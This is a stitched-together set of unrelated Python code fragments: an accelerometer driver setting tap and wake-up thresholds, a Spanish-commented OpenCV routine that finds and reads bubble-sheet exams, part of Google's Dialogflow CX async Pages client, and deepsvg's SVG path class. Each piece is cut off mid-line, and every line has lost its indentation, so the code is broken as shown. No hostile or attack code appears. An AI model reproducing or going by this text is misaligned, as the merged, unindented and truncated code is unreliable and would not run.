th1 = (float(th)/self.__range_d) * 64
value = self.read_reg(self.REG_WAKE_UP_THS)
value = value &(~0x3f)
value = value | (int(th1) & 0x3f)
#print(value)
self.write_reg(self.REG_WAKE_UP_THS,value)
'''
@brief lock interrupt Switches between latched ('1'-logic) and pulsed ('0'-logic) mode for
@n function source signals and interrupts routed to pins (wakeup, single/double-tap).
@param enable true lock interrupt.
false pulsed interrupt
'''
def __lock_interrupt(self,enable):
value = self.read_reg(self.REG_CTRL_REG3)
value = value & (~0x10)
value = value | (enable << 4)
self.write_reg(self.REG_CTRL_REG3,value)
'''
@brief Set to detect tap events in the Z direction
@param enable Ture(Enable tap detection\False(Disable tap detection)
'''
def enable_tap_detection_on_z(self, enable):
value = self.read_reg(self.REG_TAP_THS_Z)
value = value & (~(1<<5))
value = value | (enable << 5)
#print("enable_tap_detection_on_z")
#print(value)
self.write_reg(self.REG_TAP_THS_Z,value)
'''
@brief Set to detect tap events in the Y direction
@param enable Ture(Enable tap detection\False(Disable tap detection)
'''
def enable_tap_detection_on_y(self, enable):
value = self.read_reg(self.REG_TAP_THS_Z)
value = value & (~(1<<6))
value = value | (enable << 6)
#print("enable_tap_detection_on_y")
#print(value)
self.write_reg(self.REG_TAP_THS_Z,value)
'''
@brief Set to detect tap events in the X direction
@param enable Ture(Enable tap detection)\False(Disable tap detection)
'''
def enable_tap_detection_on_x(self, enable):
value = self.read_reg(self.REG_TAP_THS_Z)
value = value & (~(1<<7))
value = value | (enable << 7)
#print("enable_tap_detection_on_x")
#print(value)
self.write_reg(self.REG_TAP_THS_Z,value)
'''
@brief Set the tap threshold in the X direction
@param th Threshold(g),Can only be used in the range of ±2g
'''
def set_tap_threshold_on_x(self,th):
th1 = (float(th)/self.__range_d) * 32
value = self.read_reg(self.REG_TAP_THS_X)
value = value & (~0x1f)
value = value | (int(th1) & 0x1f)
#print("set_tap_threshold_on_x")
#print(value)
self.write_reg(self.REG_TAP_THS_X,value)
'''
@brief Set the tap threshold in the Y direction
@param th Threshold(g),Can only be used in the range of ±2g
'''
def set_tap_threshold_on_y(self,th):
th1 = (float(th)/self.__range_d) * 32
value = self.read_reg(self.REG_TAP_THS_Y)
value = value & (~0x1f)
value = value | (int(th1) & 0x1f)
#print("set_tap_threshold_on_y")
#print(value)
self.write_reg(self.REG_TAP_THS_Y,value)
'''
@brief Set the tap threshold in the Z direction
@param th Threshold(g),Can only be used in the range of ±2g
'''
def set_tap_threshold_on_z(self,th):
th1 = (float(th)/self.__range_d) * 32
value = self.read_reg(self.REG_TAP_THS_Z)
value = value & (~0x1f)
value = value | (int(th1) & 0x1f)
#print("set_tap_threshold_on_z")
#print(value)
self.write_reg(self.REG_TAP_THS_Z,value)
'''
@brief Duration of maximum time gap for double-tap recognition. When double-tap
@n recognition is enabled, this register expresses the maximum time between two
@n successive detected taps to determine a double-tap event.
@param dur duration,range: 0~15
@n time = dur * (1/rate)(unit:s)
| An example of a linear relationship between an argument and time |
|------------------------------------------------------------------------------------------------------------------------|
| | | | | |
| Data rate | 25 Hz | 100 Hz | | |
desde
# una perspectiva de planta. Además se pasa el área que tiene el contorno que
# lo rodea
def detectar_examen(imagen):
#imagen -- foto tomada al examen leída con imread-opencv
#Funciones obtenidas del repositorio de openCV para detectar cuadros en
# la imagen
def angle_cos(p0, p1, p2):
d1, d2 = (p0-p1).astype('float'), (p2-p1).astype('float')
return abs( np.dot(d1, d2) / np.sqrt( np.dot(d1, d1)*np.dot(d2, d2) ) )
def find_boxes(img):
img = cv2.GaussianBlur(img, (5, 5), 0)
squares = []
for gray in cv2.split(img):
for thrs in xrange(0, 255, 26):
if thrs == 0:
bin = cv2.Canny(gray, 0, 50, apertureSize=5)
bin = cv2.dilate(bin, None)
else:
_retval, bin = cv2.threshold(gray, thrs, 255, cv2.THRESH_BINARY)
cntours, _hierarchy = cv2.findContours(bin, cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)
for cnt in cntours:
cnt_len = cv2.arcLength(cnt, True)
cnt = cv2.approxPolyDP(cnt, 0.02*cnt_len, True)
#Esta comparación es diferente con respecto a la que utiliza
# el
if len(cnt) == 4 and cv2.contourArea(cnt) > 1000 and cv2.isContourConvex(cnt):
cnt = cnt.reshape(-1, 2)
max_cos = np.max([angle_cos( cnt[i], cnt[(i+1) % 4], cnt[(i+2) % 4] ) for i in xrange(4)])
if max_cos < 0.1:
squares.append(cnt)
return squares
#Se redimensiona la imagen para un procesamiento más rápido y eficiente
examen = imutils.resize(imagen, width=700)
#Se encuentran los recuadros de la imagen, se convierte a un numpy array
# y finalmente se ordenan según el área que ocupan en orden ascendente
recuadros = find_boxes(examen)
recuadros = np.array(recuadros)
recuadros = sorted(recuadros, key=cv2.contourArea, reverse=True)
#Se convierte la imagen a escala de grises
examensub = cv2.cvtColor(examen, cv2.COLOR_BGR2GRAY)
#Se aplica umbralización a la imagen para intentar dejar la página en
# blanco con clara distinción al fondo que lo rodea
examensub = cv2.threshold(examensub, 250, 255,
cv2.THRESH_BINARY_INV | cv2.THRESH_OTSU)[1]
#Se inicializa variable para guardar el indice que corresponde al recuadro
# del examen solamente (que contiene a la página)
indice_vp = 0
#Se recorre el ciclo según la cantidad de contornos obtenidos (esto para
# abarcarlos a todos en el análisis)
for i in range(len(recuadros)):
#Se sustraen los contornos y se utiliza la función de imutils para
# obtener la imagen que nos da la vista de planta de la imagen
examen_vp = four_point_transform(examensub, recuadros[i].reshape(4,2))
#Se guarda el ancho y largo de la imagen
height, width = examen_vp.shape[:2]
#Se inicializan las variables que guardan el valor de los pixeles a
# analizar
pixel_xi = 0
pixel_xd = 0
pixel_ya = 0
pixel_yb = 0
#Se recorre según la altura a todos los pixeles en x y se suman en la
# variable respectiva, (se coloca el punto de análisis 5 pixeles a la
# derecha del origen y 5 antes del ancho total para mejor análisis).
# Los pixeles solo pueden tener valores de 0 y 1 y así se iran sumando
for p in range(height):
pixel_xi = pixel_xi + examen_vp[p, 5]
pixel_xd = pixel_xd + examen_vp[p, width-5]
#Se repite lo anterior pero para el ancho de la imagen, siempre dejando
# un margen respectivo
for p in range(width):
pixel_ya = pixel_ya + examen_vp[5, p]
pixel_yb = pixel_yb + examen_vp[height-5, p]
#Para que la imagen sea la del examen los pixeles analizados tienen que
# sumar 0 ya que todos serían blancos al ser parte de la papeleta de
# ese color y que con la umbralización permaneción así distinto al fondo
# que se convirtió a negro. Si todos los pixeles en el margen analizado
# tanto en altura como en anchura suman 0 entonces se guarda el indice
# porque es el del examen
if pixel_xi == 0 and pixel_xd == 0 and pixel_ya == 0 and pixel_yb == 0:
indice_vp = i
break
#Con el indice encontrado se extrae el área del contorno respectivo, y
# además se obtiene el examen extraído con ese contorno visto desde planta
area = cv2.contourArea(recuadros[indice_vp])
examen = four_point_transform(examen, recuadros[indice_vp].reshape(4,2))
#Se devuelve la imagen del examen extraído y el área obtenida
return examen, area
#Devuelve el recuadro inferior del formato del examen luego de detectarlo y
# el área de la misma. Se ocupan las funciones de squares.py pero se le hace
# una modificación para limitar las áreas a detectar (tienen que ser menores
# a la del examen encontrado)
def detectar_cinfo(examen, areac):
#examen -- imagen con la perspectiva de planta aplicada del examen
#areac -- área del contorno que rodea al examen unicamente
def angle_cos(p0, p1, p2):
d1, d2 = (p0-p1).astype('float'), (p2-p1).astype('float')
return abs( np.dot(d1, d2) / np.sqrt( np.dot(d1, d1)*np.dot(d2, d2) ) )
def find_boxes(img):
img = cv2.GaussianBlur(img, (5, 5), 0)
squares = []
for gray in cv2.split(img):
for thrs in xrange(0, 255, 26):
if thrs == 0:
bin = cv2.Canny(gray, 0, 50, apertureSize=5)
bin = cv2.dilate(bin, None)
else:
_retval, bin = cv2.threshold(gray, thrs, 255, cv2.THRESH_BINARY)
cntours, _hierarchy = cv2.findContours(bin, cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)
for cnt in cntours:
cnt_len = cv2.arcLength(cnt, True)
cnt = cv2.approxPolyDP(cnt, 0.02*cnt_len, True)
#Se detectan los recuadros solo si son menores al área del
# contorno del examen y mayores que un mínimo
if len(cnt) == 4 and cv2.contourArea(cnt) > 1000 and cv2.contourArea(cnt) < areac and cv2.isContourConvex(cnt):
cnt = cnt.reshape(-1, 2)
max_cos = np.max([angle_cos( cnt[i], cnt[(i+1) % 4], cnt[(i+2) % 4] ) for i in xrange(4)])
if max_cos < 0.1:
squares.append(cnt)
return squares
#Se aplica la función para encontrar los recuadros dentro del examen y
# se convierte a un numpy array
recuadros = find_boxes(examen)
recuadros = np.array(recuadros)
#Se ordenan los recuadros encontrados en orden descendente (el más pequeño
# primero)
recuadros = sorted(recuadros, key=cv2.contourArea, reverse=False)
#De acuerdo al formato utilizado el más pequeño según los criterios de
# detección sería el recuadro inferior donde está el número de papeleta
area = cv2.contourArea(recuadros[0])
#Se devuelve el listado de recuadros ordenado y el área del primer
# recuadro (el que importa)
return recuadros, area
def leer_respuestas(exam_vistaplanta):
# exam_vistaplanta --> imagen vista desde la perspectiva de planta
#Se inicializa la lista que guardará los contornos que se pasaran a la
# comparación de correcta o incorrecta
contornos_comparar = []
#Se inicializa una lista que guarda los contornos a dibujar dentro de
# esta funció
contorno_dibujar = []
#Se inicializa el numpy array que guarda las respuestas leídas del examen
respuestasGuardadas = np.zeros((40,1))
#Se transformá la vista de planta a una escala de grises
exam_vistaplantaGris = cv2.cvtColor(exam_vistaplanta, cv2.COLOR_BGR2GRAY)
#Se aplica umbralización al examen en escala de gris y se guarda solo la
#imagen
exam_umbralizado = cv2.threshold(exam_vistaplantaGris, 0, 255,
cv2.THRESH_BINARY_INV | cv2.THRESH_OTSU)[1]
#Se extraen los contornos encontrados en el examen umbralizados, pero
# unicamente los que se encuentran más externos dentro del recuadro
contornos = cv2.findContours(exam_umbralizado.copy(), cv2.RETR_EXTERNAL,
cv2.CHAIN_APPROX_SIMPLE)
#Se extrae unicamente el array con los contornos
contornos = imutils.grab_contours(contornos)
#Se inicializan los parámetros utilizados para identificar los
# contornos que serán considerado burbujas
caja_longitud = 12
caja_relacion = 0.01
#Se inicializa el array que guardará los contornos de las burbujas
contornos_preguntas = []
#Se obtienen los contornos de las burbujas utilizando la función
# respectiva antes definida
contornos_preguntas = encontrar_opciones(contornos, caja_longitud, caja_relacion, contornos_preguntas)
#Se comprueba si hay 160 burbujas (esto debido a que se conoce el número
# fijo de opciones y de preguntas) mientras no se cumpla se deberán
# modificar los valores de los parámetros para ampliar o reducir el rango
# que identifica los contornos como burbujas
while len(contornos_preguntas) != 160:
#Se determina si hay menos burbujas de las que deberían
if len(contornos_preguntas) < 160:
#Por prueba y error se encontró que es debido a la proporción de
# aspecto, por lo que se amplia el rango que permite
caja_relacion += 0.05
#Se vacía la lista ya que se encontrarán los nuevos contornos
contornos_preguntas = []
contornos_preguntas = encontrar_opciones(contornos, caja_longitud, caja_relacion, contornos_preguntas)
#Se determina si hay más burbujas de las que | |
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from collections import OrderedDict
import functools
import re
from typing import Dict, Sequence, Tuple, Type, Union
import pkg_resources
import google.api_core.client_options as ClientOptions # type: ignore
from google.api_core import exceptions as core_exceptions # type: ignore
from google.api_core import gapic_v1 # type: ignore
from google.api_core import retry as retries # type: ignore
from google.auth import credentials as ga_credentials # type: ignore
from google.oauth2 import service_account # type: ignore
from google.cloud.dialogflowcx_v3beta1.services.pages import pagers
from google.cloud.dialogflowcx_v3beta1.types import fulfillment
from google.cloud.dialogflowcx_v3beta1.types import page
from google.cloud.dialogflowcx_v3beta1.types import page as gcdc_page
from google.protobuf import field_mask_pb2 # type: ignore
from .transports.base import PagesTransport, DEFAULT_CLIENT_INFO
from .transports.grpc_asyncio import PagesGrpcAsyncIOTransport
from .client import PagesClient
class PagesAsyncClient:
"""Service for managing
[Pages][google.cloud.dialogflow.cx.v3beta1.Page].
"""
_client: PagesClient
DEFAULT_ENDPOINT = PagesClient.DEFAULT_ENDPOINT
DEFAULT_MTLS_ENDPOINT = PagesClient.DEFAULT_MTLS_ENDPOINT
entity_type_path = staticmethod(PagesClient.entity_type_path)
parse_entity_type_path = staticmethod(PagesClient.parse_entity_type_path)
flow_path = staticmethod(PagesClient.flow_path)
parse_flow_path = staticmethod(PagesClient.parse_flow_path)
intent_path = staticmethod(PagesClient.intent_path)
parse_intent_path = staticmethod(PagesClient.parse_intent_path)
page_path = staticmethod(PagesClient.page_path)
parse_page_path = staticmethod(PagesClient.parse_page_path)
transition_route_group_path = staticmethod(PagesClient.transition_route_group_path)
parse_transition_route_group_path = staticmethod(PagesClient.parse_transition_route_group_path)
webhook_path = staticmethod(PagesClient.webhook_path)
parse_webhook_path = staticmethod(PagesClient.parse_webhook_path)
common_billing_account_path = staticmethod(PagesClient.common_billing_account_path)
parse_common_billing_account_path = staticmethod(PagesClient.parse_common_billing_account_path)
common_folder_path = staticmethod(PagesClient.common_folder_path)
parse_common_folder_path = staticmethod(PagesClient.parse_common_folder_path)
common_organization_path = staticmethod(PagesClient.common_organization_path)
parse_common_organization_path = staticmethod(PagesClient.parse_common_organization_path)
common_project_path = staticmethod(PagesClient.common_project_path)
parse_common_project_path = staticmethod(PagesClient.parse_common_project_path)
common_location_path = staticmethod(PagesClient.common_location_path)
parse_common_location_path = staticmethod(PagesClient.parse_common_location_path)
@classmethod
def from_service_account_info(cls, info: dict, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
info.
Args:
info (dict): The service account private key info.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
PagesAsyncClient: The constructed client.
"""
return PagesClient.from_service_account_info.__func__(PagesAsyncClient, info, *args, **kwargs) # type: ignore
@classmethod
def from_service_account_file(cls, filename: str, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
file.
Args:
filename (str): The path to the service account private key json
file.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
PagesAsyncClient: The constructed client.
"""
return PagesClient.from_service_account_file.__func__(PagesAsyncClient, filename, *args, **kwargs) # type: ignore
from_service_account_json = from_service_account_file
@property
def transport(self) -> PagesTransport:
"""Returns the transport used by the client instance.
Returns:
PagesTransport: The transport used by the client instance.
"""
return self._client.transport
get_transport_class = functools.partial(type(PagesClient).get_transport_class, type(PagesClient))
def __init__(self, *,
credentials: ga_credentials.Credentials = None,
transport: Union[str, PagesTransport] = "grpc_asyncio",
client_options: ClientOptions = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
) -> None:
"""Instantiates the pages client.
Args:
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
transport (Union[str, ~.PagesTransport]): The
transport to use. If set to None, a transport is chosen
automatically.
client_options (ClientOptions): Custom options for the client. It
won't take effect if a ``transport`` instance is provided.
(1) The ``api_endpoint`` property can be used to override the
default endpoint provided by the client. GOOGLE_API_USE_MTLS_ENDPOINT
environment variable can also be used to override the endpoint:
"always" (always use the default mTLS endpoint), "never" (always
use the default regular endpoint) and "auto" (auto switch to the
default mTLS endpoint if client certificate is present, this is
the default value). However, the ``api_endpoint`` property takes
precedence if provided.
(2) If GOOGLE_API_USE_CLIENT_CERTIFICATE environment variable
is "true", then the ``client_cert_source`` property can be used
to provide client certificate for mutual TLS transport. If
not provided, the default SSL client certificate will be used if
present. If GOOGLE_API_USE_CLIENT_CERTIFICATE is "false" or not
set, no client certificate will be used.
Raises:
google.auth.exceptions.MutualTlsChannelError: If mutual TLS transport
creation failed for any reason.
"""
self._client = PagesClient(
credentials=credentials,
transport=transport,
client_options=client_options,
client_info=client_info,
)
async def list_pages(self,
request: page.ListPagesRequest = None,
*,
parent: str = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> pagers.ListPagesAsyncPager:
r"""Returns the list of all pages in the specified flow.
Args:
request (:class:`google.cloud.dialogflowcx_v3beta1.types.ListPagesRequest`):
The request object. The request message for
[Pages.ListPages][google.cloud.dialogflow.cx.v3beta1.Pages.ListPages].
parent (:class:`str`):
Required. The flow to list all pages for. Format:
``projects/<Project ID>/locations/<Location ID>/agents/<Agent ID>/flows/<Flow ID>``.
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.dialogflowcx_v3beta1.services.pages.pagers.ListPagesAsyncPager:
The response message for
[Pages.ListPages][google.cloud.dialogflow.cx.v3beta1.Pages.ListPages].
Iterating over this object will yield results and
resolve additional pages automatically.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent])
if request is not None and has_flattened_params:
raise ValueError("If the `request` argument is set, then none of "
"the individual field arguments should be set.")
request = page.ListPagesRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.list_pages,
default_timeout=None,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((
("parent", request.parent),
)),
)
# Send the request.
response = await rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# This method is paged; wrap the response in a pager, which provides
# an `__aiter__` convenience method.
response = pagers.ListPagesAsyncPager(
method=rpc,
request=request,
response=response,
metadata=metadata,
)
# Done; return the response.
return response
async def get_page(self,
request: page.GetPageRequest = None,
*,
name: str = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> page.Page:
r"""Retrieves the specified page.
Args:
request (:class:`google.cloud.dialogflowcx_v3beta1.types.GetPageRequest`):
The request object. The request message for
[Pages.GetPage][google.cloud.dialogflow.cx.v3beta1.Pages.GetPage].
name (:class:`str`):
Required. The name of the page. Format:
``projects/<Project ID>/locations/<Location ID>/agents/<Agent ID>/flows/<Flow ID>/pages/<Page ID>``.
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.dialogflowcx_v3beta1.types.Page:
A Dialogflow CX conversation (session) can be described and visualized as a
state machine. The states of a CX session are
represented by pages.
For each flow, you define many pages, where your
combined pages can handle a complete conversation on
the topics the flow is designed for. At any given
moment, exactly one page is the current page, the
current page is considered active, and the flow
associated with that page is considered active. Every
flow has a special start page. When a flow initially
becomes active, the start page page becomes the
current page. For each conversational turn, the
current page will either stay the same or transition
to another page.
You configure each page to collect information from
the end-user that is relevant for the conversational
state represented by the page.
For more information, see the [Page
guide](\ https://cloud.google.com/dialogflow/cx/docs/concept/page).
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError("If the `request` argument is set, then none of "
"the individual field arguments should be set.")
request = page.GetPageRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not | |
<filename>deepsvg/svglib/svg_path.py
from __future__ import annotations
from .geom import *
import deepsvg.svglib.geom as geom
import re
import torch
from typing import List, Union
from xml.dom import minidom
import math
import shapely.geometry
import numpy as np
from .geom import union_bbox
from .svg_command import SVGCommand, SVGCommandMove, SVGCommandClose, SVGCommandBezier, SVGCommandLine, SVGCommandArc
COMMANDS = "MmZzLlHhVvCcSsQqTtAa"
COMMAND_RE = re.compile(r"([MmZzLlHhVvCcSsQqTtAa])")
FLOAT_RE = re.compile(r"[-+]?[0-9]*\.?[0-9]+(?:[eE][-+]?[0-9]+)?")
empty_command = SVGCommandMove(Point(0.))
class Orientation:
COUNTER_CLOCKWISE = 0
CLOCKWISE = 1
class SVGPath:
def __init__(self, path_commands: List[SVGCommand] = None, origin: Point = None,
closed=False, fill=False, stroke=(0,0,0), dasharray=False, stroke_width=1):
self.origin = origin or Point(0.)
self.path_commands = path_commands
self.closed = closed
self.fill = fill
self.stroke = stroke
self.dasharray = dasharray
self.stroke_width = stroke_width
@property
def start_command(self):
return SVGCommandMove(self.origin, self.start_pos)
@property
def start_pos(self):
return self.path_commands[0].start_pos
@property
def end_pos(self):
return self.path_commands[-1].end_pos
def to_group(self, *args, **kwargs):
from .svg_primitive import SVGPathGroup
return SVGPathGroup([self], *args, **kwargs)
def set_filling(self, filling=True):
# self.filling = Filling.FILL if filling else Filling.ERASE
return self
def __len__(self):
return 1 + len(self.path_commands)
def __getitem__(self, idx):
if idx == 0:
return self.start_command
return self.path_commands[idx-1]
def all_commands(self, with_close=True):
close_cmd = [SVGCommandClose(self.path_commands[-1].end_pos.copy(), self.start_pos.copy())] if self.closed and self.path_commands and with_close \
else ()
return [self.start_command, *self.path_commands, *close_cmd]
def copy(self):
return SVGPath(
[path_command.copy() for path_command in self.path_commands],
self.origin.copy(), self.closed,
fill=self.fill, stroke=self.stroke,
dasharray=self.dasharray, stroke_width=self.stroke_width
)
@staticmethod
def _tokenize_path(path_str):
cmd = None
for x in COMMAND_RE.split(path_str):
if x and x in COMMANDS:
cmd = x
elif cmd is not None:
yield cmd, list(map(float, FLOAT_RE.findall(x)))
def parse_color(col: String):
if col.startswith("#"):
h = col.lstrip('#')
rgb = tuple((int(h[i:i+2], 16))/255.0 for i in (0, 2, 4))
return rgb
return False
def color_tohex(color):
if color == False:
return "none"
else:
r,g,b = color
return '#%02x%02x%02x' % (int(r*255.0), int(g*255.0), int(b*255.0))
@staticmethod
def from_xml(x: minidom.Element):
# fill = not x.hasAttribute("fill") or not x.getAttribute("fill") == "none"
# filling = Filling.OUTLINE if not x.hasAttribute("filling") else int(x.getAttribute("filling"))
fill = SVGPath.parse_color(x.getAttribute("fill"))
stroke = SVGPath.parse_color(x.getAttribute('stroke'))
dasharray = x.getAttribute('dasharray')
stroke_width = x.getAttribute('stroke-width')
s = x.getAttribute('d')
return SVGPath.from_str(s, fill=fill, stroke=stroke, dasharray=dasharray, stroke_width=stroke_width)
@staticmethod
def from_str(s: str, fill=False, stroke=(0,0,0), dasharray=False, stroke_width=1, add_closing=False):
path_commands = []
pos = initial_pos = Point(0.)
prev_command = None
for cmd, args in SVGPath._tokenize_path(s):
cmd_parsed, pos, initial_pos = SVGCommand.from_str(cmd, args, pos, initial_pos, prev_command)
prev_command = cmd_parsed[-1]
path_commands.extend(cmd_parsed)
return SVGPath.from_commands(path_commands, fill=fill, stroke=stroke, dasharray=dasharray,
stroke_width=stroke_width, add_closing=add_closing)
@staticmethod
def from_tensor(tensor: torch.Tensor, allow_empty=False):
return SVGPath.from_commands([SVGCommand.from_tensor(row) for row in tensor], allow_empty=allow_empty)
@staticmethod
def from_commands(path_commands: List[SVGCommand], fill=False, stroke=(0,0,0),
dasharray=False, stroke_width=1, add_closing=False, allow_empty=False):
from .svg_primitive import SVGPathGroup
if not path_commands:
return SVGPathGroup([])
svg_paths = []
svg_path = None
for command in path_commands:
if isinstance(command, SVGCommandMove):
if svg_path is not None and (allow_empty or svg_path.path_commands): # SVGPath contains at least one command
if add_closing:
svg_path.closed = True
if not svg_path.path_commands:
svg_path.path_commands.append(empty_command)
svg_paths.append(svg_path)
svg_path = SVGPath([], command.start_pos.copy(), fill=fill, stroke=stroke, dasharray=dasharray, stroke_width=stroke_width)
else:
if svg_path is None:
# Ignore commands until the first moveTo commands
continue
if isinstance(command, SVGCommandClose):
if allow_empty or svg_path.path_commands: # SVGPath contains at least one command
svg_path.closed = True
if not svg_path.path_commands:
svg_path.path_commands.append(empty_command)
svg_paths.append(svg_path)
svg_path = None
else:
svg_path.path_commands.append(command)
if svg_path is not None and (allow_empty or svg_path.path_commands): # SVGPath contains at least one command
if add_closing:
svg_path.closed = True
if not svg_path.path_commands:
svg_path.path_commands.append(empty_command)
svg_paths.append(svg_path)
return SVGPathGroup(svg_paths, fill=fill, stroke=stroke, dasharray=dasharray, stroke_width=stroke_width)
def __repr__(self):
return "SVGPath(stroke:{}, fill:{}, {})".format(
self.stroke, self.fill, " ".join(command.__repr__() for command in self.all_commands()))
def to_str(self, fill=False):
return " ".join(command.to_str() for command in self.all_commands())
def to_tensor(self, PAD_VAL=-1):
return torch.stack([command.to_tensor(PAD_VAL=PAD_VAL) for command in self.all_commands()])
def _get_viz_elements(self, with_points=False, with_handles=False, with_bboxes=False, color_firstlast=False, with_moves=True):
points = self._get_points_viz(color_firstlast, with_moves) if with_points else ()
handles = self._get_handles_viz() if with_handles else ()
return [*points, *handles]
def draw(self, viewbox=Bbox(24), *args, **kwargs):
from .svg import SVG
return SVG([self.to_group()], viewbox=viewbox).draw(*args, **kwargs)
def _get_points_viz(self, color_firstlast=True, with_moves=True):
points = []
commands = self.all_commands(with_close=False)
n = len(commands)
for i, command in enumerate(commands):
if not isinstance(command, SVGCommandMove) or with_moves:
points_viz = command.get_points_viz(first=(color_firstlast and i <= 1), last=(color_firstlast and i >= n-2))
points.extend(points_viz)
return points
def _get_handles_viz(self):
handles = []
for command in self.path_commands:
handles.extend(command.get_handles_viz())
return handles
def _get_unique_geoms(self):
geoms = []
for command in self.all_commands():
geoms.extend(command.get_geoms())
return list(set(geoms))
def translate(self, vec):
for geom in self._get_unique_geoms():
geom.translate(vec)
return self
def rotate(self, angle):
for geom in self._get_unique_geoms():
geom.rotate_(angle)
return self
def scale(self, factor):
for geom in self._get_unique_geoms():
geom.scale(factor)
return self
def filter_consecutives(self):
path_commands = []
for command in self.path_commands:
if not command.start_pos.isclose(command.end_pos):
path_commands.append(command)
self.path_commands = path_commands
return self
def filter_duplicates(self, min_dist=0.2):
path_commands = []
current_command = None
for command in self.path_commands:
if current_command is None:
path_commands.append(command)
current_command = command
if command.end_pos.dist(current_command.end_pos) >= min_dist:
command.start_pos = current_command.end_pos
path_commands.append(command)
current_command = command
self.path_commands = path_commands
return self
def duplicate_extremities(self):
self.path_commands = [SVGCommandLine(self.start_pos, self.start_pos),
*self.path_commands,
SVGCommandLine(self.end_pos, self.end_pos)]
return self
def is_clockwise(self):
if len(self.path_commands) == 1:
cmd = self.path_commands[0]
return cmd.start_pos.tolist() <= cmd.end_pos.tolist()
det_total = 0.
for cmd in self.path_commands:
det_total += geom.det(cmd.start_pos, cmd.end_pos)
return det_total >= 0.
def set_orientation(self, orientation):
"""
orientation: 1 (clockwise), 0 (counter-clockwise)
"""
if orientation == self.is_clockwise():
return self
return self.reverse()
def set_closed(self, closed=True):
self.closed = closed
return self
def reverse(self):
path_commands = []
for command in reversed(self.path_commands):
path_commands.append(command.reverse())
self.path_commands = path_commands
return self
def reverse_non_closed(self):
if not self.start_pos.isclose(self.end_pos):
return self.reverse()
return self
def simplify_arcs(self):
path_commands = []
for command in self.path_commands:
if isinstance(command, SVGCommandArc):
if command.radius.iszero():
continue
if command.start_pos.isclose(command.end_pos):
continue
path_commands.extend(command.to_beziers())
else:
path_commands.append(command)
self.path_commands = path_commands
return self
def _get_topleftmost_command(self):
topleftmost_cmd = None
topleftmost_idx = 0
for i, cmd in enumerate(self.path_commands):
if topleftmost_cmd is None or cmd.is_left_to(topleftmost_cmd):
topleftmost_cmd = cmd
topleftmost_idx = i
return topleftmost_cmd, topleftmost_idx
def reorder(self):
if self.closed:
topleftmost_cmd, topleftmost_idx = self._get_topleftmost_command()
self.path_commands = [
*self.path_commands[topleftmost_idx:],
*self.path_commands[:topleftmost_idx]
]
return self
def to_video(self, wrapper, clips=None, svg_commands=None, color="grey"):
from .svg import SVG
from .svg_primitive import SVGLine, SVGCircle
if clips is None:
clips = []
if svg_commands is None:
svg_commands = []
svg_dots, svg_moves = [], []
for command in self.all_commands():
start_pos, end_pos = command.start_pos, command.end_pos
if isinstance(command, SVGCommandMove):
move = SVGLine(start_pos, end_pos, color="teal", dasharray=0.5)
svg_moves.append(move)
dot = SVGCircle(end_pos, radius=Radius(0.1), color="red")
svg_dots.append(dot)
svg_path = SVGPath(svg_commands).to_group(color=color)
svg_new_path = SVGPath([SVGCommandMove(start_pos), command]).to_group(color="red")
svg_paths = [svg_path, svg_new_path] if svg_commands else [svg_new_path]
im = SVG([*svg_paths, *svg_moves, *svg_dots]).draw(do_display=False, return_png=True, with_points=False)
clips.append(wrapper(np.array(im)))
svg_dots[-1].color = "grey"
svg_commands.append(command)
svg_moves = []
return clips, svg_commands
def numericalize(self, n=256):
for command in self.all_commands():
command.numericalize(n)
def smooth(self):
# https://github.com/paperjs/paper.js/blob/c7d85b663edb728ec78fffa9f828435eaf78d9c9/src/path/Path.js#L1288
n = len(self.path_commands)
knots = [self.start_pos, *(path_commmand.end_pos for path_commmand in self.path_commands)]
r = [knots[0] + 2 * knots[1]]
f = [2]
p = [Point(0.)] * (n + 1)
# Solve with the Thomas algorithm
for i in range(1, n):
internal = i < n - 1
a = 1
b = 4 if internal else 2
u = 4 if internal else 3
v = 2 if internal else 0
m = a / f[i-1]
f.append(b-m)
